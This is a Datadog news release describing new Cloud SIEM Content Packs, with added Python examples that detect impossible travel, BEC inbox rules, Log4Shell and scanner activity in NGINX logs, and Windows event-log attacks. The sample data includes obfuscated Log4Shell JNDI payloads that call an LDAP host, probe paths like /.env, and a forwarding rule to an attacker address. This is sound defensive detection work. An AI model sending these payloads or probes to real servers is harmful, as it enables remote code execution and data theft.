Datadog Inc.

09/12/2024 | News release | Distributed by Public on 09/12/2024 15:19

What’s new in Cloud SIEM Content Packs: September 2024

Implementing a security information and event management (SIEM) system can be complex and often requires considerable expertise. Teams need to onboard a variety of data sources and ensure the SIEM scales with growing log volumes. Users also need time to learn the system, which delays the point at which it delivers value. And a SIEM needs continuous maintenance to keep threat intelligence, detection rules, and integrations up to date.

Datadog's Cloud SIEM Content Packs help customers rapidly onboard to Datadog Cloud SIEM so they can gain security insights faster. Content Packs provide a wealth of out-of-the-box content tailored to specific integrations, including pre-built threat detection rules, dashboards, an interactive investigator tool, workflow automation blueprints, and comprehensive written resources.

Since their launch in August 2023, we've expanded Cloud SIEM Content Packs, which initially included AWS CloudTrail, GCP Audit Logs, Azure Security, Kubernetes Audit Logs, Okta, 1Password, and Cloudflare, with a range of additional integrations. New additions include Google Security Command Center, Auth0, JumpCloud, Cisco Duo, Google Workspace, Microsoft 365, Slack, Cisco Meraki, Palo Alto Network Firewall, Cisco Umbrella DNS, NGINX, GitHub, CrowdStrike, and Windows Event Logs.

In this post, we'll highlight the latest additions to Cloud SIEM Content Packs and explore how they can help you strengthen security engineering and operations. We'll cover new Content Packs available in key areas of the security ecosystem: cloud security, authentication, collaboration, network security, web security, cloud developer tools, and endpoint security.

Cloud security

Datadog Cloud SIEM analyzes cloud security findings, including suspicious users and potential threat activity, and organizes them by priority level to help you monitor your cloud instances for weak points, potential attacks, and code-level vulnerabilities.

Google Security Command Center

As your cloud infrastructure scales, so does your attack surface, making it essential to identify and address security threats. Google Cloud Security Command Center helps monitor your Google Cloud instances for vulnerabilities. Now, Datadog integrates these findings into Cloud SIEM.

This integration centralizes Security Command Center findings from your Google Cloud environment in Datadog, alongside the logs, traces, and metrics you already collect from across the stack. With that context close at hand, you can streamline investigations and remediate issues before a finding turns into a compromise.

The integration comes with a built-in detection rule that generates a security signal in Cloud SIEM whenever Google Security Command Center detects an active threat. This rule filters for threat findings that have not been muted and focuses on those that signal potential active attacks or other malicious activities, helping teams respond to and mitigate threats more quickly.

View the Google Security Command Center Content Pack, or learn more in our blog post.

Authentication

Datadog Cloud SIEM can help you monitor and understand user and account access activity across authentication and audit logs, making it easier to catch unauthorized or over-privileged access.

Auth0

Auth0 is an authentication and authorization platform that provides developers the building blocks needed to secure applications written in any language or using any stack. It also helps them define the third-party providers and integrations that they want to use for a variety of identity and access management (IAM) use cases.

With the Auth0 Content Pack for Cloud SIEM, you can easily monitor security signals on Auth0 user activity and receive alerts on suspicious behavior so you can respond quickly. The integration includes several detection rules, as well as an out-of-the-box dashboard.

Let's say you're looking to improve visibility into activity occurring in Auth0. With this Content Pack, you can set up real-time notifications with high priority when an Auth0 tenant invitation is sent to a new user, a credential stuffing attack is detected, Guardian MFA push notifications are rejected, and more. The interactive Auth0 dashboard delivers detailed insights to help you stay on top of your logs and security signals, as well as track user activity, debug authentication and authorization issues, and create an audit trail for regulatory compliance.

View the Auth0 Content Pack, or learn more from our documentation.

Cisco Duo

Cisco Duo is a security platform that offers multi-factor authentication (MFA) and secure access controls, so that only trusted users and devices can reach company applications and data. By integrating Cisco Duo with Cloud SIEM, organizations can monitor and analyze authentication activity in real time, detect potential security threats, and support regulatory compliance. The integration helps security teams identify unusual access patterns and correlate Duo logs with other security data for a broader view of the organization's security posture.

The four detection rules featured in our new Content Pack help you detect the creation of a Cisco Duo bypass code by an administrator or a suspicious actor, monitor the use of such codes for user authentication, identify fraudulent authentication requests, and detect administrator account lockouts after multiple failed login attempts.

View the Cisco Duo Content Pack, or learn more from the configuration guide.

JumpCloud

JumpCloud is a cloud-based directory platform that provides centralized identity and access management, allowing organizations to manage user identities, devices, and access to IT resources securely. By integrating Datadog Cloud SIEM with JumpCloud audit logs, organizations can track user activity and gain real-time insight into login attempts, access changes, and other actions. This helps detect suspicious activity and potential security threats early enough for a timely response. Correlating JumpCloud logs with other security data in Datadog also gives you a single view of your security posture and an audit trail to support regulatory compliance.

With the pre-built detection rules offered in our JumpCloud Content Pack, security teams can receive notifications for a range of critical events, including:

  • Users logging into JumpCloud with admin credentials without MFA
  • Admin accounts granting system privileges to other accounts
  • Modifications or creations of policies
  • Assignment of administrator roles to user accounts
  • Detection of credential stuffing attacks
  • Identification of impossible travel scenarios where accounts are accessed from geographically distant locations within unrealistic time frames
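The two JumpCloud rules that involve some logic rather than a single field match are the admin-login-without-MFA rule and impossible travel. The following is an added example, not Datadog's rule logic and not JumpCloud's log schema: it runs both checks over constructed login events. The field names (`user`, `is_admin`, `mfa`, `success`, `ts`, `city`, `lat`, `lon`) and the 900 km/h speed threshold are assumptions.

```python
# Added example, not Datadog's rule logic and not JumpCloud's log schema: two of
# the JumpCloud detections listed above (admin login without MFA, impossible
# travel) run over constructed login events. Field names are assumptions.
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_SPEED_KMH = 900.0  # about airliner speed; anything faster is "impossible"

# Constructed sample events (not real JumpCloud data).
EVENTS = [
    {"user": "alice", "is_admin": False, "mfa": True, "success": True,
     "ts": "2024-09-12T09:00:00+00:00", "city": "New York", "lat": 40.7128, "lon": -74.0060},
    {"user": "alice", "is_admin": False, "mfa": True, "success": True,
     "ts": "2024-09-12T10:30:00+00:00", "city": "Singapore", "lat": 1.3521, "lon": 103.8198},
    {"user": "bob", "is_admin": False, "mfa": True, "success": True,
     "ts": "2024-09-12T09:00:00+00:00", "city": "New York", "lat": 40.7128, "lon": -74.0060},
    {"user": "bob", "is_admin": False, "mfa": True, "success": True,
     "ts": "2024-09-12T13:00:00+00:00", "city": "Boston", "lat": 42.3601, "lon": -71.0589},
    {"user": "carol", "is_admin": True, "mfa": False, "success": True,
     "ts": "2024-09-12T11:00:00+00:00", "city": "Boston", "lat": 42.3601, "lon": -71.0589},
    # A failed attempt is not an MFA bypass, so the rule must ignore it.
    {"user": "dave", "is_admin": True, "mfa": False, "success": False,
     "ts": "2024-09-12T11:05:00+00:00", "city": "Boston", "lat": 42.3601, "lon": -71.0589},
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi = p2 - p1
    dlam = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def admin_logins_without_mfa(events):
    """Rule 1: successful admin logins where no MFA factor was presented."""
    return [e["user"] for e in events if e["success"] and e["is_admin"] and not e["mfa"]]


def impossible_travel(events, max_speed_kmh=MAX_PLAUSIBLE_SPEED_KMH):
    """Rule 2: consecutive successful logins per user that imply travelling faster
    than max_speed_kmh. Returns (user, from_city, to_city, implied_speed_kmh)."""
    by_user = defaultdict(list)
    for e in events:
        if e["success"]:
            by_user[e["user"]].append(e)
    findings = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        for prev, cur in zip(evs, evs[1:]):
            dist = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            delta = datetime.fromisoformat(cur["ts"]) - datetime.fromisoformat(prev["ts"])
            hours = delta.total_seconds() / 3600
            # Two logins in the same second from different places are still impossible;
            # guard the division rather than crashing on them.
            if hours > 0:
                speed = dist / hours
            else:
                speed = float("inf") if dist > 0 else 0.0
            if speed > max_speed_kmh:
                findings.append((user, prev["city"], cur["city"], round(speed)))
    return findings


if __name__ == "__main__":
    print("admin logins without MFA:", admin_logins_without_mfa(EVENTS))
    print("impossible travel:", impossible_travel(EVENTS))
```

Alice's New York to Singapore hop in 90 minutes implies roughly 10,000 km/h and is flagged; Bob's New York to Boston trip over four hours is not. In production you would also exclude known VPN egress ranges and corporate proxies, which are the usual source of false positives for this rule.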

View the JumpCloud Content Pack, or learn more in our blog post.

Collaboration

Cloud SIEM's integrations with collaboration and ChatOps solutions enable you to view, analyze, and monitor audit logs from these tools, and to centralize and correlate this data so that teams can quickly identify and respond to security incidents. This visibility supports more effective monitoring, streamlined investigations, and improved compliance across collaborative environments.

Google Workspace

Google Workspace audit logs provide essential data for monitoring the security of your cloud-based productivity tools. With Datadog's integration, you can search, analyze, and alert on these logs, centralizing key events, such as user logins, from Google Workspace applications like Gmail and Google Drive. This integration enhances your ability to detect potential security issues and quickly remediate problems by correlating Google Workspace audit logs with activity logs, metrics, and traces from your entire stack.

Our Google Workspace Content Pack features more than 15 rules that help security teams safeguard their Google Workspace content, including any sensitive data. These rules range from lower-priority alerts, such as a user disabling their two-step verification, to higher-priority alerts, such as changes to account recovery information and other critical events. Together they cover the main ways an account or its data can be quietly taken over in a Google Workspace environment.

View the Google Workspace Content Pack, or learn more in our blog post.

Microsoft 365

Microsoft 365 offers cloud-based productivity tools like Office, Skype, and Teams, which are central to many organizations' workflows. Monitoring activity across these services is crucial for security and compliance. Datadog now allows you to ingest Microsoft 365 audit logs, providing real-time analysis and alerts for security threats. This integration helps track key actions, user activity, and authentication events, enriching logs with metadata for better visibility and faster remediation.

With nearly 30 pre-built detection rules for Microsoft 365, security teams can protect their Microsoft 365 content and sensitive data. These rules cover a range of priorities, including low-priority alerts like the appearance of a new Microsoft Teams app or bot, or a SharePoint object being shared with a guest. They also include high-priority detections, such as the deletion of multiple Microsoft Teams, or Exchange inbox-rule activity of the kind associated with business email compromise (BEC) attacks. Together they give nuanced coverage of your Microsoft 365 environment.
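The inbox-rule detection deserves a concrete illustration, because a BEC inbox rule is recognisable from a handful of parameters: forwarding to an outside domain, deleting or hiding matching mail, filtering on finance keywords, and a near-empty rule name. The following is an added example, not Datadog's rule and not Microsoft's code. It runs over constructed Microsoft 365 audit records whose `Operation`/`Parameters` layout mirrors the unified audit log as an assumption; the org domain list, folder list, keyword list, and all record values are made up.

```python
# Added example, not Datadog's rule and not Microsoft's code: flag Exchange inbox
# rules that carry the traits typical of business email compromise, run over
# constructed Microsoft 365 unified audit log records. The Operation/Parameters
# layout mirrors the audit log as an assumption; every value is made up.
import json
import re

ORG_DOMAINS = {"example.com"}
INBOX_RULE_OPS = {"New-InboxRule", "Set-InboxRule"}
# Folders attackers use to park mail the victim never looks at.
HIDING_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history",
                  "junk email", "deleted items", "archive"}
FINANCE_WORDS = {"invoice", "payment", "wire", "bank", "password"}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")

# Constructed sample records (the AuditData JSON of each audit log entry).
RECORDS = [
    json.dumps({"Operation": "New-InboxRule", "Workload": "Exchange",
                "UserId": "cfo@example.com", "ClientIP": "203.0.113.7",
                "Parameters": [{"Name": "Name", "Value": "."},
                               {"Name": "SubjectContainsWords", "Value": "invoice;payment"},
                               {"Name": "MoveToFolder", "Value": "RSS Subscriptions"},
                               {"Name": "MarkAsRead", "Value": "True"}]}),
    json.dumps({"Operation": "Set-InboxRule", "Workload": "Exchange",
                "UserId": "ap@example.com", "ClientIP": "198.51.100.4",
                "Parameters": [{"Name": "Identity", "Value": "Vendor mail"},
                               {"Name": "ForwardTo", "Value": "collector@attacker.example"},
                               {"Name": "DeleteMessage", "Value": "True"}]}),
    json.dumps({"Operation": "New-InboxRule", "Workload": "Exchange",
                "UserId": "dev@example.com", "ClientIP": "192.0.2.9",
                "Parameters": [{"Name": "Name", "Value": "CI noise"},
                               {"Name": "From", "Value": "ci@example.com"},
                               {"Name": "MoveToFolder", "Value": "Builds"}]}),
    json.dumps({"Operation": "UserLoggedIn", "Workload": "AzureActiveDirectory",
                "UserId": "dev@example.com"}),
]


def params(record):
    """Flatten the Parameters name/value list into a dict."""
    return {p["Name"]: p["Value"] for p in record.get("Parameters", [])}


def has_external_address(value):
    """True if any address in the value belongs to a domain outside ORG_DOMAINS."""
    return any(a.rsplit("@", 1)[1].lower() not in ORG_DOMAINS
               for a in EMAIL_RE.findall(value))


def bec_indicators(record):
    """Return the BEC traits present in one inbox-rule record (empty if benign)."""
    if record.get("Workload") != "Exchange" or record.get("Operation") not in INBOX_RULE_OPS:
        return []
    p = params(record)
    hits = []
    for key in ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"):
        if key in p and has_external_address(p[key]):
            hits.append(f"{key} to external address")
    if p.get("DeleteMessage", "").lower() == "true":
        hits.append("DeleteMessage")
    if p.get("MoveToFolder", "").lower() in HIDING_FOLDERS:
        hits.append(f"MoveToFolder {p['MoveToFolder']}")
    words = {w.strip().lower() for w in p.get("SubjectContainsWords", "").split(";")}
    if words & FINANCE_WORDS:
        hits.append("finance keyword filter")
    # Attackers commonly name rules "." or "," so they are easy to overlook in Outlook.
    if "Name" in p and len(p["Name"].strip()) <= 2:
        hits.append("near-empty rule name")
    return hits


def detect(records_json):
    """Run bec_indicators over raw AuditData strings; one finding per suspicious rule."""
    findings = []
    for raw in records_json:
        rec = json.loads(raw)
        hits = bec_indicators(rec)
        if hits:
            findings.append({"user": rec["UserId"], "ip": rec.get("ClientIP"),
                             "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in detect(RECORDS):
        print(finding)
```

Any one indicator is worth a look; two or more on the same rule, created from an IP the user has never logged in from, is the classic post-phishing BEC pattern and belongs at high priority. The developer's "CI noise" rule trips none of the checks, which is the kind of benign rule a keyword-only detection would otherwise flag.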

View the Microsoft 365 Content Pack, or learn more in our blog post.

Slack

Integrating Slack audit logs with Cloud SIEM provides real-time monitoring and analysis of critical events such as logins, file downloads, and configuration changes. This integration provides a unified view of security signals in your Slack environment through centralized log management, so you can swiftly detect and remediate security issues.

A collection of pre-built Slack detection rules provides comprehensive security for your organization's sensitive internal communications and data. These rules cover a wide spectrum of activities. They can detect lower-priority events like the creation or deletion of an organization in Slack, as well as higher-priority issues such as changes to Slack SSO settings, modifications to data loss prevention (DLP) rules, or elevation of user roles to administrative privileges. By monitoring these activities, you can ensure robust protection against potential threats and maintain strict control over your Slack environment, enhancing both security and compliance.

View the Slack Content Pack, or learn more in our blog post.

Network security

Integrating Datadog Cloud SIEM with network security solutions enhances your security posture by providing comprehensive visibility and streamlined threat detection across your network infrastructure. Cloud SIEM analyzes security event logs and alerts on events such as intrusion detections, firewall rule violations, malware threat detections, and more. You can correlate activity across various network sources for faster identification of anomalies and potential security incidents.

Cisco Meraki

The Cisco Meraki MX security appliance uses Sourcefire Snort for intrusion detection and anti-malware technology for threat protection. It inspects HTTP file downloads and blocks or allows them based on threat intelligence from the AMP cloud. The intrusion detection engine monitors the network for malicious or unusual behaviors and raises alerts on potential threats. The appliance can also act as an intrusion prevention system (IPS), blocking harmful packets. Datadog Cloud SIEM analyzes Cisco Meraki security event logs to identify when intrusion detection system (IDS) alerts are created by the Meraki MX security appliance.

This integration not only alerts teams to potential threats but also provides valuable insights through a pre-built dashboard. The dashboard offers detailed views into log trends, user activity, and potential attacker patterns, enhancing the ability to detect, analyze, and respond to security incidents effectively. By consolidating these signals and trends, security teams can improve threat detection, streamline investigations, and strengthen network security.

View the Cisco Meraki Content Pack, or learn more in our blog post.

Cisco Umbrella DNS

Integrating Cisco Umbrella DNS with Datadog Cloud SIEM enhances your network security by providing comprehensive DNS-layer protection. Cisco Umbrella is renowned for its network DNS security monitoring, offering visibility and protection for users both on and off the network. By collecting DNS and proxy logs and sending them to Datadog, this integration enables easy searching and analysis through out-of-the-box log pipelines. Datadog's dashboards visualize total DNS requests, allowed/blocked domains, top blocked categories, and proxied traffic over time. Additionally, with Datadog Cloud SIEM, Umbrella DNS logs are analyzed using threat intelligence to identify potential threats, making it an invaluable tool for threat hunting and investigations.

The detection rules included in this content pack identify access to personal networks and flag requests to unsafe URL categories, helping you prevent unauthorized access. Our pre-built dashboard provides a concise and intuitive snapshot of network activity, offering you a comprehensive overview with total, blocked, and allowed metrics. This allows for immediate insights into web activity, empowering you to make informed decisions quickly. And by tracking proxied requests over time, you can identify trends and proactively optimize your network.

View the Cisco Umbrella DNS Content Pack, or learn more from our configuration guide.

Palo Alto Network Firewall

Integrating Datadog Cloud SIEM with Palo Alto Network Firewall enables you to analyze your logs for suspicious activities using industry-standard threat intelligence. With built-in detection rules, Datadog can flag and alert you to suspicious activities, like changes to firewall settings or unexpected traffic patterns. When a rule is triggered, Datadog generates a Security Signal with detailed context, enabling you to quickly assess and respond to potential threats. This integration ensures proactive threat mitigation, allowing you to maintain a secure network environment effectively.

The pre-built detection rules for this content pack identify suspicious activities, such as command-and-control traffic and crypto mining activity. Our interactive dashboard offers deep insights into top suspicious users, potential threats, flagged IPs, countries, and more. This comprehensive view allows you to quickly pinpoint and address security issues, so you can maintain a secure, efficient network.

View the Palo Alto Network Firewall Content Pack, or learn more in our blog post.

Web security

Datadog Cloud SIEM enhances web security by providing visibility and real-time threat detection across web applications and services. It can monitor web traffic, detect anomalies, and identify attack attempts such as SQL injection, cross-site scripting, or DDoS. By combining analytics with automation, Cloud SIEM helps security teams respond swiftly to web-based threats.

NGINX

Integrating Datadog Cloud SIEM with NGINX enables comprehensive monitoring and response to web-based risks, providing real-time visibility into NGINX server activities so teams can detect potential threats and respond swiftly. By leveraging pre-built threat detection rules and dashboards, organizations can enhance their web security posture and ensure a robust defense against emerging threats.

This integration enables you to detect malicious scans targeting your web servers. It includes out-of-the-box detection rules for exploitation attempts against your Apache or NGINX web servers as seen in their request logs, including attempts to exploit the Log4j vulnerability.
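Both of those detections operate on the access log alone. The following is an added example, not Datadog's detection rules: it parses NGINX combined-format log lines and flags Log4Shell-style `${jndi:...}` lookups in the request line, referer, or user agent (after undoing URL encoding and the common `${lower:j}` and `${::-j}` obfuscations), and separately flags scanner behaviour, meaning one client accumulating 404s across many distinct paths. The log lines are constructed and the 404 threshold is an assumption.

```python
# Added example, not Datadog's detection rules: parse NGINX combined-format
# access log lines and flag (a) Log4Shell-style JNDI lookups in the request,
# referer or user agent, after undoing URL encoding and the usual ${lower:..}
# and ${..:-x} obfuscations, and (b) scanner behaviour, one client collecting
# 404s across many distinct paths. Log lines are constructed; thresholds are assumptions.
import re
from collections import defaultdict
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
DEFAULT_VALUE_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")                       # ${::-j}, ${env:NaN:-j}
CASE_LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)  # ${lower:j}
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
SCAN_404_THRESHOLD = 5  # distinct 404 paths from one IP before we call it a scanner

# Constructed sample log lines (not real traffic).
LOG_LINES = [
    '203.0.113.5 - - [12/Sep/2024:15:19:00 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"',
    '203.0.113.5 - - [12/Sep/2024:15:19:01 +0000] "GET /wp-login.php HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"',
    '203.0.113.5 - - [12/Sep/2024:15:19:01 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"',
    '203.0.113.5 - - [12/Sep/2024:15:19:02 +0000] "GET /.git/config HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"',
    '203.0.113.5 - - [12/Sep/2024:15:19:02 +0000] "GET /admin/ HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"',
    '203.0.113.5 - - [12/Sep/2024:15:19:03 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"',
    # URL-encoded, case-obfuscated payload in the query string.
    '198.51.100.9 - - [12/Sep/2024:15:20:00 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.5%3A1389%2Fa%7D HTTP/1.1" 200 612 "-" "curl/8.0"',
    # Default-value obfuscation in the user agent, the header Log4Shell scanners hit most.
    '198.51.100.9 - - [12/Sep/2024:15:20:01 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.5:1389/a}"',
    '192.0.2.4 - - [12/Sep/2024:15:21:00 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "https://example.com/" "Mozilla/5.0"',
    '192.0.2.4 - - [12/Sep/2024:15:21:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "https://example.com/" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the combined-format fields of one line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split()
    rec["path"] = parts[1] if len(parts) >= 2 else rec["request"]
    return rec


def contains_jndi(text):
    """Normalise then look for ${jndi:...}; handles multi-level URL encoding and nested lookups."""
    s = text
    for _ in range(3):          # peel double/triple URL encoding
        s = unquote(s)
    for _ in range(10):         # bounded so hostile input cannot loop forever
        new = CASE_LOOKUP_RE.sub(r"\1", DEFAULT_VALUE_RE.sub(r"\1", s))
        if new == s:
            break
        s = new
    return JNDI_RE.search(s) is not None


def detect(lines, scan_threshold=SCAN_404_THRESHOLD):
    """Return JNDI hits as (ip, field) and scanners as (ip, distinct_404_paths)."""
    jndi_hits = []
    not_found_paths = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("request", "referer", "ua"):
            if contains_jndi(rec[field]):
                jndi_hits.append((rec["ip"], field))
        if rec["status"] == "404":
            not_found_paths[rec["ip"]].add(rec["path"])
    scanners = sorted((ip, len(p)) for ip, p in not_found_paths.items() if len(p) >= scan_threshold)
    return {"jndi": jndi_hits, "scanners": scanners}


if __name__ == "__main__":
    print(detect(LOG_LINES))
```

Counting distinct paths rather than raw requests is deliberate: a browser retrying one missing asset produces many 404s but only one path, while a scanner walks a wordlist. The normalisation step matters more than the final regex; a plain `${jndi:` match misses every obfuscated variant in the sample.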

View the NGINX Content Pack, or learn more in our blog post.

Cloud developer tools

Cloud developer tools have become indispensable for building, deploying, and managing applications. Developers increasingly rely on these tools to store and collaborate on critical code, and ensuring their security has become paramount. Datadog Cloud SIEM offers comprehensive visibility into key developer tools, with real-time monitoring and analysis of security events across your cloud infrastructure.

GitHub

GitHub is a mission-critical software development and version control platform that stores proprietary source code and other sensitive data. Monitoring logs generated by activity in your GitHub environment is essential, as unexpected patterns of behavior could indicate attacker activity or insider threats. The Datadog GitHub Cloud SIEM integration ingests and normalizes audit logs streamed from GitHub, and includes detection rules that surface suspicious activity in those logs that might signal an attack, such as anomalous cloning of repositories or the addition of new enterprise administrators.

The pre-built detection rules available with this integration cover a wide spectrum of security priorities. They include lower-priority alerts, such as identifying when GitHub payments are removed or when branch protection requirements are overridden by repository administrators, and higher-priority alerts for suspicious activities like the disabling or bypassing of GitHub Secret Scanning or the deactivation of GitHub Dependabot settings. By catching these issues early, you can take swift corrective action to prevent breaches and preserve the integrity of your development environment.

View the GitHub Content Pack, or learn more in our blog post.

Endpoint security

Cloud infrastructure and endpoints are prime targets for cyberattacks, making it critical to integrate SIEMs with endpoint security solutions. Datadog Cloud SIEM offers real-time monitoring and comprehensive visibility across your entire cloud environment, and integrating with endpoint solutions extends this capability to individual devices.

CrowdStrike

CrowdStrike is a single-agent solution to stop breaches, ransomware, and cyberattacks with comprehensive visibility and protection across endpoints, workloads, data, and identity. The Datadog Cloud SIEM CrowdStrike integration helps detect suspicious activity to improve the security posture of your endpoints.

When CrowdStrike raises an alert, our third-party detection method will identify the following CrowdStrike events and notify security teams for rapid response:

  • Detection summary
  • Firewall match
  • Identity protection
  • IDP detection summary
  • Incident summary
  • Authentication events
  • Detection status updates
  • Uploaded IoCs
  • Network containment events
  • IP allowlisting events
  • Policy management events
  • CrowdStrike store activity
  • Real-time response session start/end
  • Event stream start/stop

Our integration features a detection rule that generates signals in Cloud SIEM from critical CrowdStrike logs and alerts, ensuring real-time threat awareness. The interactive dashboard offers a comprehensive view of top events, security signals, and alerts by user and host, allowing your security team to quickly identify and prioritize threats. With the ability to search, filter, and alert on all CrowdStrike events within Datadog, you can focus on relevant data and improve your overall security efficiency.

View the CrowdStrike Content Pack, or check out our documentation.

Windows event logs

Windows event logs contain detailed records generated by the Windows OS that capture system, security, and application events, providing essential insights for diagnosing issues and detecting unauthorized access attempts. By sending Windows event logs to Datadog Cloud SIEM, security teams can gain real-time visibility into system activities, detect suspicious behavior, and respond promptly to threats. They can also correlate these logs with other security data in Datadog, enhancing incident investigation and compliance with a comprehensive view of security posture.

This integration provides more than 10 pre-built detection rules that alert security teams to suspicious activities. Medium-priority alerts notify you of events like multiple failed login attempts, suspicious named pipes, and disabled Windows firewalls. High-priority alerts cover critical activities such as changes to the Domain Admins group, Directory Services Restore Mode password modifications, and clearing of the audit log.
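Three of those rules map directly onto well-known Security-log event IDs, and the failed-logon rule is a good illustration of why a threshold over a time window is needed rather than a single-event match. The following is an added example, not Datadog's rules: it runs a failed-logon burst check, an audit-log-cleared check, and a privileged-group-membership check over constructed events. The event IDs (4625, 1102, 4728/4756) are the standard Windows ones; the flattened record shape, the five-failures-in-ten-minutes threshold, and the group list are assumptions.

```python
# Added example, not Datadog's rules: three of the Windows Security-log
# detections described above (failed-logon burst, audit log cleared, member
# added to a privileged domain group) run over constructed events. Event IDs
# are the standard Windows ones; thresholds and the flattened record shape are assumptions.
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED_LOGON_THRESHOLD = 5
FAILED_LOGON_WINDOW = timedelta(minutes=10)
# 4728 = member added to a security-enabled global group, 4756 = universal group.
# 4732 is a *local* group (e.g. BUILTIN\Administrators) and is tracked separately.
PRIV_GROUP_ADD_IDS = {4728, 4756}
WATCHED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins"}


def _ev(event_id, clock, **fields):
    """Build one flattened event record for the constructed sample below."""
    return {"EventID": event_id, "TimeCreated": f"2024-09-12T{clock}+00:00",
            "Computer": "DC01", **fields}


# Constructed sample events (not real logs).
EVENTS = [
    _ev(4625, "15:00:00", TargetUserName="svc-backup", IpAddress="10.0.0.5"),
    _ev(4625, "15:00:30", TargetUserName="svc-backup", IpAddress="10.0.0.5"),
    _ev(4625, "15:01:00", TargetUserName="svc-backup", IpAddress="10.0.0.5"),
    _ev(4625, "15:01:30", TargetUserName="svc-backup", IpAddress="10.0.0.5"),
    _ev(4625, "15:02:00", TargetUserName="svc-backup", IpAddress="10.0.0.5"),
    _ev(4625, "15:02:30", TargetUserName="svc-backup", IpAddress="10.0.0.5"),
    _ev(4625, "15:03:00", TargetUserName="jdoe", IpAddress="10.0.0.21"),  # two typos, not a burst
    _ev(4625, "15:03:20", TargetUserName="jdoe", IpAddress="10.0.0.21"),
    _ev(4624, "15:03:40", TargetUserName="jdoe", IpAddress="10.0.0.21"),
    _ev(4728, "15:10:00", SubjectUserName="svc-backup", TargetUserName="Domain Admins",
        MemberName="CN=svc-backup,OU=Service,DC=example,DC=com"),
    _ev(4732, "15:10:05", SubjectUserName="svc-backup", TargetUserName="Remote Desktop Users",
        MemberName="CN=svc-backup,OU=Service,DC=example,DC=com"),
    _ev(1102, "15:12:00", SubjectUserName="svc-backup"),
]


def failed_logon_bursts(events, threshold=FAILED_LOGON_THRESHOLD, window=FAILED_LOGON_WINDOW):
    """Sliding window per account over 4625 events; returns {account: count when first triggered}."""
    recent = defaultdict(deque)
    flagged = {}
    for e in sorted((e for e in events if e["EventID"] == 4625), key=lambda e: e["TimeCreated"]):
        acct = e["TargetUserName"]
        t = datetime.fromisoformat(e["TimeCreated"])
        q = recent[acct]
        q.append(t)
        while t - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and acct not in flagged:
            flagged[acct] = len(q)
    return flagged


def detect(events):
    """Return findings as {priority, rule, detail}; single-event rules first, then the burst rule."""
    findings = []
    for e in events:
        if e["EventID"] == 1102:
            findings.append({"priority": "high", "rule": "audit_log_cleared",
                             "detail": f"{e.get('SubjectUserName')} cleared the Security log on {e['Computer']}"})
        elif e["EventID"] in PRIV_GROUP_ADD_IDS and e.get("TargetUserName") in WATCHED_GROUPS:
            findings.append({"priority": "high", "rule": "privileged_group_member_added",
                             "detail": f"{e.get('MemberName')} added to {e['TargetUserName']} "
                                       f"by {e.get('SubjectUserName')}"})
    for acct, n in failed_logon_bursts(events).items():
        findings.append({"priority": "medium", "rule": "failed_logon_burst",
                         "detail": f"{n} failed logons for {acct} within {FAILED_LOGON_WINDOW}"})
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Note that the same account appears in all three findings in order: a burst of failures, then a group addition, then the log being cleared. That sequence is exactly what correlation in the SIEM is for; each rule alone is medium or high, but the three together on one host inside fifteen minutes should be treated as an active intrusion.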

View the Windows event logs Content Pack, or learn more in our blog post.

Speed up and simplify your security monitoring with Content Packs

Datadog Cloud SIEM Content Packs help security teams rapidly onboard their SIEM by bundling the content that belongs with each key integration. Teams can gain actionable security insights into their cloud environments to keep up with threats in real time, visually investigate across historical data, and automate response with Datadog Workflow Automation.

Read more about Content Packs in our dedicated blog post, and check our documentation for a frequently updated Content Packs library. If you don't already have a Datadog account, you can sign up for a 14-day free trial to get started.